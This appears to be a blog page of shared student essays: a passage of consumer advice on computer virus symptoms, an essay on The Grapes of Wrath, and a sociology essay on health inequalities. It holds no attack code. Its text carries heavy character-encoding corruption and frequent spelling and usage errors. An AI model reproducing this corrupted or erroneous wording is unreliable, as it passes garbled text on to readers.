¬Ã‚ ¢ Documents become inaccessible. à ¢Ã¢â€š ¬Ã‚ ¢ Computer freezes up or wont start properly. à ¢Ã¢â€š ¬Ã‚ ¢ The CAPS LOCK key quits working-or works intermittently. à ¢Ã¢â€š ¬Ã‚ ¢ Files increase in size. à ¢Ã¢â€š ¬Ã‚ ¢ Frequent error messages appear onscreen. à ¢Ã¢â€š ¬Ã‚ ¢ Strange messages or pictures appear onscreen. à ¢Ã¢â€š ¬Ã‚ ¢ Your PC emits strange sounds. à ¢Ã¢â€š ¬Ã‚ ¢ Friends and colleagues inform you that theyve received strange e-mails from you, that you dont remember sending. How to Catch a Virus. Recovering from a Virus Attack If youre unfortunate enough to be the victim of a virus attack, your options narrow. You have to find the infected files on your computer, and then either dies-infects them (by removing the virus Code) or delete them-hopefully before the virus has done any permanent damage to your system. You dont, however, have to give up and throw your computer away. Almost all viruses can be recovered from-some quite easily. All you need is a little information, and the right tools. The right tools include one of the major antivirus programs discussed in Anti-Virus Software and Services. These programs-such as Norton Antivirus

Friday, October 25, 2019

Free Grapes of Wrath Essays: The Joads Journey :: Grapes Wrath essays

The Joad's Journey in The Grapes of Wrath Throughout history man has made many journeys, both far and wide. Moses’ great march through the Red Sea and Columbus's traversing the Atlantic are examples of only a couple of men’s great voyages. Even today, great journeys are being made. Terry Fox's run across Canada while fighting cancer is one of these such journeys. In every one of these instances people have had to rise above themselves and overcome immense odds, similar to a salmon swimming upstream to full fill it's life line. Intense drive and extreme fortitude are qualities they needed to posses during their travels. In The Grapes of Wrath, Steinbeck illustrates the Joad’s endurance by his use of extended metaphors in intercalary chapters. Steinbeck uses intercalary chapters to provide background for the various themes in the novel. He effectively foreshadows upcoming events by telling of the general state of the local population in the intercalary chapters. He then narrows it down to how it effects the main characters of the novel, which are the Joads. Setting the tone of the novel in the reader’s mind is another function of Steinbeck's intercalary chapters. In chapter three, Steinbeck immaculately describes the long, tedious journey of a land turtle across a desolate highway. From the onset of his journey, the turtle encounters many setbacks. Along the way ants, hills, and oak seeds hinder him under his shell. The turtle’s determination to reach his destination is most apparent when a truck driven by a young man swerves to hit the turtle. The turtle's shell is clipped and he goes flying off the highway, but the turtle does not stop. He struggles back to his belly and keeps driving toward his goal, just as the Joads keep driving toward their goal. Much like the turtle from chapter three, the Joads had to face many great hardships in their travels. The planes of Oklahoma, with their harsh summer weather, were the Joads desolated highways. The truck driver represented the Californians, who Buried food and killed livestock to keep the Joads and others like them away from their dream. And their ants and hills were sickness. Even through all of this, the Joads persevered. They were driven by two great motivating powers, poverty and hunger. Just as the turtle searched for food, the Joads were searching for paradise, "The Garden of Eden.

Thursday, October 24, 2019

Inequalities in health Essay

Introduction. Mildred Baxter conducted a survey in 1990 on Health and Lifestyles, and asked 10,000 people how they defined health, her results were defined by Three answers: – Positive Definitions- where health is defined as feeling fit and able to undertake any reasonable task. Negative Definitions- where health is defined in terms of being free from pain and discomfort. Functional Definitions- where people define health in terms of being able to perform a range of tasks. Whereas Medical Definitions state that: – Illness is always based on an identifiable (physical/mental) cause. Illnesses and their causes can be identified, classified and measured. The cure lies in the physical body of a person, not their social relationships or their spiritual life. There is reliance upon drugs and surgery. During this essay I will be looking at the inequalities, (inequalities means that something is not equal to something else), in Health, with regards to class, ethnics, gender and age. There are several possible explanations for inequalities in health, these include: – Social and material reasons, (whereby because of poverty in society, it leads to ill health, because of poor housing, nutrition, etc), Cultural, religion reasons, (because of the difference in diet, and certain beliefs and habits that effect health), The effect an individual has on his or her own health, (by choosing what they eat, drink and whether they smoke or not). Social class We could argue that the standard of healthcare in different social classes are because of geographical reasons, and the level of funding that the government gives to poorer, lower class areas compared to the level that is given to richer, middle/higher class areas. This can be seen in the Black Report (1980) and The Health Divide (1987). These reports clearly show such strong evidence of social class inequalities in health that the government tried to suppress the findings. The Acheson report (1998) then went on to confirm the evidence of social class inequalities and recommend more help for poorer social classes by a means of improving their health. We can also clearly see from research that lower, poorer classes have a higher mortality rate, (including infant), than the higher classes, these are mainly seen in Respiratory Disease, Injuries and poisoning and Cerebro-vascular Disease, this is because lower classes tend to work mainly in manual work, (factories with dangerous machinery, working in bad weather conditions, etc). Tudor-Hart (1971), first suggested in the Inverse Care Law, that higher class that need it least gets more resources and lower classes that needs it most gets the least resources, So social class inequalities are made worse by inequalities in the NHS, this is because poorer areas don’t have as many GP practices, they have to depend on public transport, and are more likely to loose pay for taking time off. Whereas it is thought that the middle/higher classes have the resources to find out what healthcare they are entitled to, and are more likely to fight against poor health services, and are able to jump NHS waiting lists by paying privately. We can argue that material explanations suggest that those who suffer poor health do not have a healthy balanced diet, inadequate housing conditions, lack of education and joblessness, all stem from poverty, which shows the link between material deprivation and ill-health. Criticisms;- We can argue that poverty and class status in society is not just the reasons for poor health; it also comes down to the individual choices and cultural choices that are made by people in their life. We are not told we have to smoke or drink or take drugs, we do it because we want to, which we can argue is one of the reasons Respiratory Diseases and Heart disease are on the increase. We can also argue that another reason why these diseases and other health problems, such as obesity, which is high in lower classes, are on the increase is because of the cheap unhealthy food that is being eaten, and lack of exercise, is also an individual choice. Ethnic Inequalities We can argue that Ethnic groups experience poor levels of health as a result of inequalities in the health service. A comprehensive survey (The Health of Britain’s Ethnic minorities), was conducted in 1997 by James Nazroo, his findings challenged the view that biology and culture were the main factors that explained the health of ethnic groups in the UK, but instead focused on the importance of socio-economic factors. The findings found that: – people from black and Indian minorities are more likely to suffer from TB, Diabetes and Heart Disease, people from ethnic minorities are more likely to be hospitalised for mental illnesses, and most ethnic minorities show higher rates of still births, prenatal deaths and infant deaths as well as higher mortality rate. We can see from research conducted by the Health Authority that up to 50% of ethnic minorities described themselves as having poor health. We could argue that the reasons for this is because of poverty and material deprivation, while racism and discrimination also play an important factor, Minority groups have the lowest income, the worst housing, and the highest unemployment rates in the UK. We can also argue that other cultural reasons such as language barriers, religious reasons and the lack of knowledge of the dietary needs for ethnic minorities, from health professionals may lead to ethnic minorities not seeking medical advice and thus having poorer health. Criticisms: – We can argue that not all ethnic minorities share the same level of inequalities, Black African, Caribbean; ethnic groups are more accepted in society than Asians, Chinese groups make more money than Bangladeshi groups. We can also argue that it is also down to social class, a middle class ethnic minority doctor is more likely to be accepted than an unemployed lower class ethnic minority. We can also argue that it also individual choices that lead to inequalities, e. g.social exclusion, a lot of minority do not integrate in the community, instead they stay in groups of their own race. Ethnic minorities also believe that a strong sense of cultural identity protects against the effects of poverty. Gender Inequalities Through research we have found than women on the whole are healthier than men and that women’s mortality rates are lower than that of men. According to Hilary Graham (2002), men have fewer consultations with GP’s and have lower levels of illness. We could argue that this is because in society from the time we are born we are taught a â€Å"normal† role in society, firstly by our parents and then by schools, media etc, and boys and girls from a young age are given toys, (dolls, cleaning toys etc for girl, tools, cars etc for boys), which gives them a stereotypical role that is expected of them, because of this it is much excepted in society that women can go to the doctors more because they are a weaker sex, where a man is expected to be masculine and except illness. We could also argue that men mostly work in manual jobs, and that is why they have a higher mortality rate, whereas women take on a more domestic role, looking after the home and children, although we could argue that this is a large reason why women visit the doctors more often than men, according to Ellen Annandale (1998) women who work have better levels of health than those who do not, because of the sense of independence and a wider social network, thus lowering the number of women with depression. It has also been found that women are more like to be living in poverty than men, because for example most single parents are women on a low income. Criticisms: – We could argue that gender inequalities are lowering due to more women now having equal educational opportunities and having equal roles in a work place, it is now not so frowned upon that a man stays home with the children and women go to work. More women have become more career minded and education have become more â€Å"women† friendly. We can also argue that domestic labour has become easier for women in the home with the development of technology e.g. dishwashers, washing machines etc. There is also evidence to suggest women are biologically stronger than men, more male babies die than female, and they have a higher biological possibility of living longer. Age Inequalities We can argue that elderly peoples’ opinions of health differ greatly from those of younger people; elderly people accept a range of physical pain and limitations, whereas younger people would define them as symptoms of illness. We re-evaluate what illness is as we get older and accept greater levels of discomfort as â€Å"one of those things†, that comes with age. Mildred Baxter in her survey of Health found that young people define health in terms of physical fitness, whereas older people defined it in terms of being able to cope with everyday tasks. We can also argue that the poverty elderly people face also contribute towards ill health, because they cannot afford adequate heating, balanced diet etc, because the live on a low income, or may not know the benefits they are entitled to. Research has also found that elderly people do not visit the doctor because they see themselves as â€Å"wasting time†. Criticisms: – We can argue that inequalities can again occur because of individual choices, it could be argued that a poor diet is not just because of low income but they may live alone and cannot be bothered to cook for themselves. We also see that social class plays a part, because wealthy elderly people do not face the same inequalities in health as lower class elderly people. We can also see that the government have taken steps to improve the health of elderly people by introducing the flu vaccine and by giving heating grants etc. Conclusion. To conclude I think that there are no strong arguments to say that there is one specific social or materialist explanation for inequalities in health. I think that there are a number of factors that contribute towards inequalities, from geographical, social, financial, cultural, economical, religious reasons, to biological reasons. I also think that the choices we make as individuals’ plays a major factor towards the inequalities that we encounter in heath, and by changing certain things in our life that we have control over there would be fewer inequalities.